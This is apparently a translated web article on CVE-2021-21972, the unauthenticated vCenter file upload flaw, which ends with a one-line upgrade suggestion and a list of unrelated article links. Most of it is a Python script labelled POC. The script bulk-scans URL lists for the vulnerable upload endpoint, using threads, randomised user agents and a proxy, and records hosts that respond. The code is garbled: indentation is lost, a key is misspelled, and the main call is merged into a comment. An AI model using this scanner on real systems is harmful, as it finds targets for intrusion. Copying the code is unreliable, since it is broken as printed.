About the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972)
backgroundCVE-2021-21972 An unauthenticated command execution vulnerability in VMware vCenter. This vulnerability can upload a webshell to any location on the vcenter server and then execute the webshell. Affected versions vmware:esxi:7.0/6.7/6.5 Vulnerability reproduction fofa query Syntax:
POC
Use
#-*- coding:utf-8 -*-
banner = """
888888ba dP
88 `8b 88
a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
88 `8b. 88' `88 88 Y8ooooo. 88 88
88 .88 88. .88 88 88 88. .88
88888888P `88888P8 dP `88888P' `88888P'
ooooooooooooooooooooooooooooooooooooooooooooooooooooo
@time:2021/02/24 CVE-2021-21972.py
C0de by NebulabdSec - @batsu
"""
print(banner)
import threadpool
import random
import requests
import argparse
import http.client
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
TARGET_URI = "/ui/vropspluginui/rest/services/uploadova"
def get_ua():
first_num = random.randint(55, 62)
third_num = random.randint(0, 3200)
fourth_num = random.randint(0, 140)
os_type = [
'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
'(Macintosh; Intel Mac OS X 10_12_6)'
]
chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
'(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
)
return ua
def CVE_2021_21972(url):
proxies = {"scoks5": "http://127.0.0.1:1081"}
headers = {
'User-Agent': get_ua(),
"Content-Type": "application/x-www-form-urlencoded"
}
targetUrl = url + TARGET_URI
try:
res = requests.get(targetUrl,
headers=headers,
timeout=15,
verify=False,
proxies=proxies)
# proxies={'socks5': 'http://127.0.0.1:1081'})
# print(len(res.text))
if res.status_code == 405:
print("[+] URL:{}--------CVE-2021-21972 vulnerability exists".format(url))
# print("[+] Command success result: " + res.text + "\n")
with open("vulnerability address.txt", 'a') as fw:
fw.write(url + '\n')
else:
print("[-] " + url + " No CVE-2021-21972 vulnerability was found.\n")
# except Exception as e:
# print(e)
except:
print("[-] " + url + " Request ERROR.\n")
def multithreading(filename, pools=5):
works = []
with open(filename, "r") as f:
for i in f:
func_params = [i.rstrip("\n")]
# func_params = [i] + [cmd]
works.append((func_params, None))
pool = threadpool.ThreadPool(pools)
reqs = threadpool.makeRequests(CVE_2021_21972, works)
[pool.putRequest(req) for req in reqs]
pool.wait()
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-u",
"--url",
help="Target URL; Example:http://ip:port")
parser.add_argument("-f",
"--file",
help="Url File; Example:url.txt")
# parser.add_argument("-c", "--cmd", help="Commands to be executed; ")
args = parser.parse_args()
url = args.url
# cmd = args.cmd
file_path = args.file
if url != None and file_path ==None:
CVE_2021_21972(url)
elif url == None and file_path != None:
multithreading(file_path, 10) # default 15 threads if __name__ == "__main__":
main()
EXP Repair Suggestions Upgrade vCenter Server 7.0 to 7.0.U1c This is the end of this article about the VMware vcenter unauthorized arbitrary file upload vulnerability (CVE-2021-21972). For more related VMware vcenter upload vulnerability content, please search 123WORDPRESS.COM's previous articles or continue to browse the following related articles. I hope everyone will support 123WORDPRESS.COM in the future! You may also be interested in:
|
<<: Introduction to query commands for MySQL stored procedures
>>: Vue makes div height draggable
Recommend
Summary of Mysql slow query operations
Mysql slow query explanation The MySQL slow query...
How to parse the attribute interface of adding file system in Linux or Android
The first one: 1. Add key header files: #include ...
The concept of MySQL tablespace fragmentation and solutions to related problems
Table of contents background What is tablespace f...
Summary of some common uses of refs in React
Table of contents What are Refs 1. String type Re...
Simple Implementation of HTML to Create Personal Resume
Resume Code: XML/HTML CodeCopy content to clipboa...
Analysis of the Principle of MySQL Index Length Limit
This article mainly introduces the analysis of th...
Three strategies for rewriting MySQL query statements
Table of contents Complex query and step-by-step ...
Click on the lower right corner of the css pseudo-class to see a check mark to indicate the selected sample code
Effect: css: .s_type { border: none; border-radiu...
Summary of SQL query optimization knowledge points for MySQL tens of millions of big data
1. To optimize the query, try to avoid full table...
Linux bridge method steps to bridge two VirtualBox virtual networks
This article originated from my complaints about ...
Vue implements the countdown component for second kills
This article shares the specific code of Vue to i...
10 Deadly Semantic Mistakes in Web Typography
<br />This is from the content of Web front-...
Self-study of MySql built-in functions knowledge points summary
String functions Check the ascii code value of th...
CSS uses the placeholder-shown pseudo-class to achieve the floating text effect of the input box
In this post, we’ll use the :placeholder-shown ps...
Vue custom components use event modifiers to step on the pit record
Preface Today, when I was using a self-written co...